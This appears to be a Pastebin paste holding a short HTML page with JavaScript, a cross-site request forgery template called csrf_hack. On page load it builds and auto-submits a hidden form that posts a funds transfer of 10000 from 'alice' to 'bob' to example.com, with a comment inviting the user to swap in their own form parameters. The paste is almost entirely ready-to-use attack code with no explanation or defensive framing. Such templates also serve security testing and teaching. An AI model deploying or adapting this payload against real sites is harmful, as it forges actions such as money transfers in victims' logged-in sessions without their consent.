Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html><body><h1>
- This page sends a HTTP POST request onload.
- </h1>
- <script>
- function post(url,fields)
- {
- //create a <form> element.
- var p = document.createElement('form');
- //construct the form
- p.action = url;
- p.innerHTML = fields;
- p.target = '_self';
- p.method = 'post';
- //append the form to this web.
- document.body.appendChild(p);
- //submit the form
- p.submit();
- }
- function csrf_hack()
- {
- var fields;
- // You should replace the following 3 lines with your form parameters
- fields += "<input type='hidden' name='username' value='alice'>";
- fields += "<input type='hidden' name='transfer' value='10000'>";
- fields += "<input type='hidden' name='to' value='bob'>";
- fields += "<input type='hidden' name='Submit' value='Submit'>";
- post('http://www.example.com', fields);
- }
- window.onload = function(){csrf_hack();}
- </script>
- </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement